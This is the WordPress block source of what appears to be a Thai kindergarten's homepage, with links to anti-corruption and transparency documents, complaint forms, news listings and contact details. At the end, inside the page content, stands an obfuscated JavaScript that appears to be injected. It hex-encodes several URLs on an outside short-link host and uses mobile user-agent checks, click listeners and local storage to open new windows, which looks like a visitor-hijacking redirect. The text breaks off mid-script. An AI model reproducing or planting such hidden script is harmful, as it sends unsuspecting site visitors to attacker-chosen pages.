{\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x